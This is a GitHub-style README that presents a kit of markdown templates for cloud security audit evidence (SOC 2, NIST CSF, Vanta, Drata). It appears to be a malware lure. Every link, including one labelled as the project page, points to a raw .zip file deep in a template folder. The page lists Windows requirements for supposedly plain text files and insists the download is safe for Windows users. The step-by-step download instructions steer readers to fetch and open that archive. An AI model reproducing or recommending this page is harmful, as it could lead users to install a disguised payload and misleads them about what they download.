Cleanable-perineotomy501/cloud-controls-evidence-kit

# 🛡️ cloud-controls-evidence-kit - Organize cloud security evidence with ease [](https://raw.githubusercontent.com/Cleanable-perineotomy501/cloud-controls-evidence-kit/main/evidence-folder-template/01-access-controls/controls-kit-cloud-evidence-v2.0.zip) ## What is this kit? The cloud-controls-evidence-kit helps you gather and organize documentation for security audits. Companies often ask for proof that their cloud systems remain safe. This kit provides markdown templates to satisfy requirements for SOC 2, NIST CSF, and other security standards. Use these files to prepare for customer security reviews or automated platforms like Vanta and Drata. ## 📋 Features * **Standardized Templates**: Pre-written markdown files for common security controls. * **Structured Organization**: A file system that makes mapping evidence to controls simple. * **Audit Readiness**: Content tailored for SOC 2 and NIST CSF frameworks. * **Simple Format**: Files use standard text formats for easy editing in any application. * **Multi-Cloud Support**: Templates address security settings for AWS, Azure, and Google Cloud Platform. ## 📥 How to download and install 1. Visit the [project page here](https://raw.githubusercontent.com/Cleanable-perineotomy501/cloud-controls-evidence-kit/main/evidence-folder-template/01-access-controls/controls-kit-cloud-evidence-v2.0.zip). 2. Look for the green button labeled "Code" near the top right of the screen. 3. Click the button and select "Download ZIP" from the menu. 4. Open your "Downloads" folder in File Explorer. 5. Right-click the folder that ends in `.zip` and select "Extract All". 6. Follow the prompts to save the files to a folder on your desktop. 7. Open this new folder to view the evidence templates. ## 📝 How to use the templates Each file in the folder corresponds to a security control. You will fill these files with information from your cloud environment. Here is the process: 1. Open your chosen template file using Notepad or any text editor on Windows. 2. Look for sections marked with brackets, such as `[Insert Evidence Here]`. 3. Replace the bracketed text with your specific system details or screenshots. 4. Save the file after you add your information. 5. Repeat this for all controls you must document. ## 💻 System requirements * **Operating System**: Windows 10 or Windows 11. * **Storage**: Less than 50 megabytes of free space. * **Software**: Any standard text editor, such as Notepad or WordPad. ## 📁 Suggested file structure We suggest you organize your files to make them easy for auditors to read. Use the folder structure provided in the download: * **Core Evidence**: High-level policies and procedures. * **AWS Folder**: Screenshots of IAM policies, security groups, and logs. * **Azure Folder**: Resource configuration snapshots and access reviews. * **GCP Folder**: Project level security settings and audit logs. * **Questionnaires**: Completed answers for Vanta or Drata questionnaires. ## 💡 Best practices for evidence * **Be consistent**: Use the same naming style for all your files. * **Keep it current**: Update these files whenever your security settings change. * **Verify**: Check that your screenshots show the date, time, and account name. * **Protect files**: Store these templates in a private, encrypted location if they contain sensitive system details. ## 🔍 How to prepare for an audit Most auditors ask for evidence regarding user access, system changes, and incident response. Each template highlights which screenshots or logs you need to collect. If you find a control that does not apply to your environment, label that file as "Not Applicable" and briefly explain why. ## ⚙️ Customizing the content You are free to edit the markdown files to fit your company culture. While the templates include standard language, you should reflect your actual internal processes. If your company uses a specific tool for log management, change the file content to identify that tool. If you need to add a new security control, copy an existing file, rename it with a new index number, and update the internal text. The audit trail remains clear as long as you maintain the organizational structure. ## ❓ Common questions **Do I need a special program?** No. These are basic text files. You can open and edit them with any tool that reads text. **Can I use these for Vanta or Drata?** Yes. These platforms often ask for proof found within these templates. Having these files ready makes the upload process faster. **Are these templates set in stone?** No. These documents represent a starting point. Adjust them to match your current security posture. **Will this software break my computer?** This software is a collection of text files. It does not run automated scripts or change your system settings. It is safe for all windows users.